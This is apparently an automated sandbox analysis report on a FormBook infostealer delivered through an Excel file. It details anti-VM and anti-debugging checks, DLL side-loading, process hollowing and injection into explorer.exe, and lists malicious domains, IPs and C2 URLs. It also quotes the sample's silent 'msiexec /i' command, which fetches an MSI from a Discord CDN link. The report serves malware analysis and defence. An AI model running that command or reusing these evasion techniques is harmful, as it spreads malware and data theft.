Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Installer\MSID8B1.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Installer\MSID8B1.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Installer\MSID8B1.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Installer\MSID8B1.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Installer\MSID8B1.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wininit.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect virtualization through RDTSC time measurements
Source: C:\Windows\Installer\MSID8B1.tmp RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Installer\MSID8B1.tmp RDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wininit.exe RDTSC instruction interceptor: First address: 00000000000898E4 second address: 00000000000898EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wininit.exe RDTSC instruction interceptor: First address: 0000000000089B4E second address: 0000000000089B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_00940101 rdtsc 7_2_00940101
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\msiexec.exe TID: 2944 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\System32\msiexec.exe TID: 2944 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 2336 Thread sleep time: -54000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\wininit.exe TID: 2264 Thread sleep time: -70000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: explorer.exe, 00000008.00000002.2343968360.00000000001F5000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000008.00000000.2111770353.000000000842E000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000008.00000000.2106036941.0000000004263000.00000004.00000001.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
Source: explorer.exe, 00000008.00000000.2111770353.000000000842E000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: MSID8B1.tmp, 00000006.00000002.2096256432.0000000000534000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: explorer.exe, 00000008.00000002.2344004696.0000000000231000.00000004.00000020.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
Source: C:\Windows\Installer\MSID8B1.tmp Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Checks if the current process is being debugged
Source: C:\Windows\Installer\MSID8B1.tmp Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\wininit.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_00940101 rdtsc 7_2_00940101
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008F00C4 NtCreateFile,LdrInitializeThunk, 7_2_008F00C4
Contains functionality to read the PEB
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 6_2_10001000 mov eax, dword ptr fs:[00000030h] 6_2_10001000
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 6_2_005015DB mov eax, dword ptr fs:[00000030h] 6_2_005015DB
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 6_2_005017F3 mov eax, dword ptr fs:[00000030h] 6_2_005017F3
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_009026F8 mov eax, dword ptr fs:[00000030h] 7_2_009026F8
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_022026F8 mov eax, dword ptr fs:[00000030h] 9_2_022026F8
Enables debug privileges
Source: C:\Windows\Installer\MSID8B1.tmp Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\wininit.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 6_2_1000144A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_1000144A

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.duoteshop.com
Source: C:\Windows\explorer.exe Domain query: www.destek-taleplerimiz.com
Source: C:\Windows\explorer.exe Network Connect: 192.0.78.25 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.adimadimingilizce.com
Source: C:\Windows\explorer.exe Network Connect: 99.83.154.118 80 Jump to behavior
DLL side loading technique detected
Source: C:\Windows\Installer\MSID8B1.tmp Section loaded: C:\Users\user\AppData\Local\Temp\nsjB879.tmp\5rov.dll Jump to behavior
Source: C:\Windows\Installer\MSID8B1.tmp Section loaded: C:\Users\user\AppData\Local\Temp\nsjB879.tmp\5rov.dll Jump to behavior
Source: C:\Windows\Installer\MSID8B1.tmp Section loaded: C:\Users\user\AppData\Local\Temp\nsjB879.tmp\5rov.dll Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Windows\Installer\MSID8B1.tmp Section loaded: unknown target: C:\Windows\Installer\MSID8B1.tmp protection: execute and read and write Jump to behavior
Source: C:\Windows\Installer\MSID8B1.tmp Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\Installer\MSID8B1.tmp Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\Installer\MSID8B1.tmp Section loaded: unknown target: C:\Windows\SysWOW64\wininit.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\Installer\MSID8B1.tmp Section loaded: unknown target: C:\Windows\SysWOW64\wininit.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\wininit.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\wininit.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\Installer\MSID8B1.tmp Thread register set: target process: 1388 Jump to behavior
Source: C:\Windows\Installer\MSID8B1.tmp Thread register set: target process: 1388 Jump to behavior
Source: C:\Windows\SysWOW64\wininit.exe Thread register set: target process: 1388 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Windows\Installer\MSID8B1.tmp Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Sample uses process hollowing technique
Source: C:\Windows\Installer\MSID8B1.tmp Section unmapped: C:\Windows\SysWOW64\wininit.exe base address: 1D0000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msiexec.exe mSiExec /i https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi /qn Jump to behavior
Source: C:\Windows\Installer\MSID8B1.tmp Process created: C:\Windows\Installer\MSID8B1.tmp C:\Windows\Installer\MSID8B1.tmp Jump to behavior
Source: C:\Windows\Installer\MSID8B1.tmp Process created: C:\Windows\SysWOW64\wininit.exe C:\Windows\SysWOW64\wininit.exe Jump to behavior
Source: C:\Windows\SysWOW64\wininit.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Installer\MSID8B1.tmp' Jump to behavior
Source: explorer.exe, 00000008.00000002.2344162820.00000000006F0000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000008.00000002.2344162820.00000000006F0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000008.00000002.2343968360.00000000001F5000.00000004.00000020.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000008.00000002.2344162820.00000000006F0000.00000002.00000001.sdmp Binary or memory string: !Progman
Source: C:\Windows\System32\msiexec.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000001.2092255175.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2149002116.0000000000340000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2344479784.0000000001EF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2096304655.0000000000710000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2149044072.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2344499238.0000000001F20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 7.2.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.MSID8B1.tmp.710000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.MSID8B1.tmp.710000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.1.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.1.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000001.2092255175.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2149002116.0000000000340000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2344479784.0000000001EF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2096304655.0000000000710000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2149044072.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2344499238.0000000001F20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 7.2.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.MSID8B1.tmp.710000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.MSID8B1.tmp.710000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.1.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.1.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 402839 Sample: 0d69e4f6_by_Libranalysis Startdate: 03/05/2021 Architecture: WINDOWS Score: 100 32 www.111bjs.com 2->32 34 111bjs.com 2->34 36 cdn.discordapp.com 2->36 44 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->44 46 Found malware configuration 2->46 48 Malicious sample detected (through community Yara rule) 2->48 50 10 other signatures 2->50 9 MSID8B1.tmp 19 2->9         started        13 EXCEL.EXE 10 8 2->13         started        signatures3 process4 file5 30 C:\Users\user\AppData\Local\Temp\...\5rov.dll, PE32 9->30 dropped 60 Detected unpacking (changes PE section rights) 9->60 62 Maps a DLL or memory area into another process 9->62 64 DLL side loading technique detected 9->64 66 Tries to detect virtualization through RDTSC time measurements 9->66 15 MSID8B1.tmp 9->15         started        68 Obfuscated command line found 13->68 18 cmd.exe 13->18         started        signatures6 process7 signatures8 70 Modifies the context of a thread in another process (thread injection) 15->70 72 Maps a DLL or memory area into another process 15->72 74 Sample uses process hollowing technique 15->74 76 Queues an APC in another process (thread injection) 15->76 20 wininit.exe 15->20         started        23 explorer.exe 15->23 injected 26 msiexec.exe 18->26         started        process9 dnsIp10 52 Modifies the context of a thread in another process (thread injection) 20->52 54 Maps a DLL or memory area into another process 20->54 56 Tries to detect virtualization through RDTSC time measurements 20->56 28 cmd.exe 20->28         started        38 adimadimingilizce.com 192.0.78.25, 49166, 80 AUTOMATTICUS United States 23->38 40 www.destek-taleplerimiz.com 99.83.154.118, 49167, 80 AMAZON-02US United States 23->40 42 2 other IPs or domains 23->42 58 System process connects to network (likely due to code injection or exploit) 23->58 signatures11 process12
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
192.0.78.25
 adimadimingilizce.com United States
2635 AUTOMATTICUS true
99.83.154.118
 www.destek-taleplerimiz.com United States
16509 AMAZON-02US true

Contacted Domains

Name IP Active
adimadimingilizce.com 192.0.78.25 true
cdn.discordapp.com 162.159.129.233 true
www.destek-taleplerimiz.com 99.83.154.118 true
111bjs.com 34.102.136.180 true
www.adimadimingilizce.com unknown unknown
www.duoteshop.com unknown unknown
www.111bjs.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
www.111bjs.com/ccr/ true
  • Avira URL Cloud: malware
 low
http://www.adimadimingilizce.com/ccr/?y4O4=T9ggCBMXA5kAUDbc6O9tV0ryY3konbkqBjEqxZCv5OYSRYyBdrwjx1uFIWjpE/1JsOmiOw==&pHE=kv2pMLCxOn true
  • Avira URL Cloud: safe
 unknown
http://www.destek-taleplerimiz.com/ccr/?y4O4=cWavVGQKmIqDppXzWyVy8r7Kst7Id+XyOUJHTBkcFhMzlMGfnIsimvg2OkFJfjv7X60kTQ==&pHE=kv2pMLCxOn true
  • Avira URL Cloud: safe
 unknown